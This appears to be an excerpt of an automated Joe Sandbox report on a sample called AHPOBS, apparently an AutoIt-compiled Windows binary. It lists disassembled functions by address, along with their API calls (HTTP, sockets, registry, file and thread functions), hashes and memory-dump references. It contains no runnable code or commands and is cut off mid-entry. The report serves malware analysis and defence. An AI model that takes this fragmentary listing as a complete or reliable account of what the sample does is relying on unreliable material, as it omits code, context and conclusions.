                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                      • String ID: H
                                      • API String ID: 3613100350-2852464175
                                      • Opcode ID: 9d3c49c6d24913a472e3df38ef122a9d7de9c00d0aee7b9721676272f5ae5082
                                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                      • Opcode Fuzzy Hash: 9d3c49c6d24913a472e3df38ef122a9d7de9c00d0aee7b9721676272f5ae5082
                                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                      Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 1291720006-3916222277
                                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                      Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                      • String ID: crts
                                      • API String ID: 586820018-3724388283
                                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                      Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: cd17e702cf469e9a820d51d57d2ae1e0a1ce3e580828d7d51bfaf3e801677bf9
                                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                      • Opcode Fuzzy Hash: cd17e702cf469e9a820d51d57d2ae1e0a1ce3e580828d7d51bfaf3e801677bf9
                                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                      Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                      • __lock.LIBCMT ref: 00417981
                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                      • __lock.LIBCMT ref: 004179A2
                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL$pI
                                      • API String ID: 637971194-197072765
                                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                      Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$_malloc
                                      • String ID:
                                      • API String ID: 1938898002-0
                                      • Opcode ID: 76dd2d35befe38722f803b573f9ece9906a1b27f99362cba3195e17a5e4461cd
                                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                      • Opcode Fuzzy Hash: 76dd2d35befe38722f803b573f9ece9906a1b27f99362cba3195e17a5e4461cd
                                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                      Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                      • _memmove.LIBCMT ref: 0044B555
                                      • _memmove.LIBCMT ref: 0044B578
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                      • String ID:
                                      • API String ID: 2737351978-0
                                      • Opcode ID: fca9f5b298af2d5d62029c6e118b4ab992b51aa14ec4f10c6f249258b73cd42e
                                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                      • Opcode Fuzzy Hash: fca9f5b298af2d5d62029c6e118b4ab992b51aa14ec4f10c6f249258b73cd42e
                                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                      Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                      • __calloc_crt.LIBCMT ref: 00415246
                                      • __getptd.LIBCMT ref: 00415253
                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                      • _free.LIBCMT ref: 0041529E
                                      • __dosmaperr.LIBCMT ref: 004152A9
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                      • String ID:
                                      • API String ID: 3638380555-0
                                      • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                      • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                      Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                      • _memmove.LIBCMT ref: 004656CA
                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                      • WSACleanup.WSOCK32 ref: 00465762
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                      • String ID:
                                      • API String ID: 2945290962-0
                                      • Opcode ID: 4795c790589efa9604366ab314be66f87df03ced37406f02fbff6eb4d423be89
                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                      • Opcode Fuzzy Hash: 4795c790589efa9604366ab314be66f87df03ced37406f02fbff6eb4d423be89
                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                      Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                      • String ID:
                                      • API String ID: 1457242333-0
                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                      Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                      Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcstok.LIBCMT ref: 004675B2
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcscpy.LIBCMT ref: 00467641
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcslen.LIBCMT ref: 004677BD
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                      • String ID: X
                                      • API String ID: 780548581-3081909835
                                      • Opcode ID: 66398beec43ac6de6e3bacdcf7465ee468cb7a280e343b0bfb8d6aa535c4b6dc
                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                      • Opcode Fuzzy Hash: 66398beec43ac6de6e3bacdcf7465ee468cb7a280e343b0bfb8d6aa535c4b6dc
                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                      Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                      • CloseFigure.GDI32(?), ref: 0044751F
                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                      • String ID:
                                      • API String ID: 4082120231-0
                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                      Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
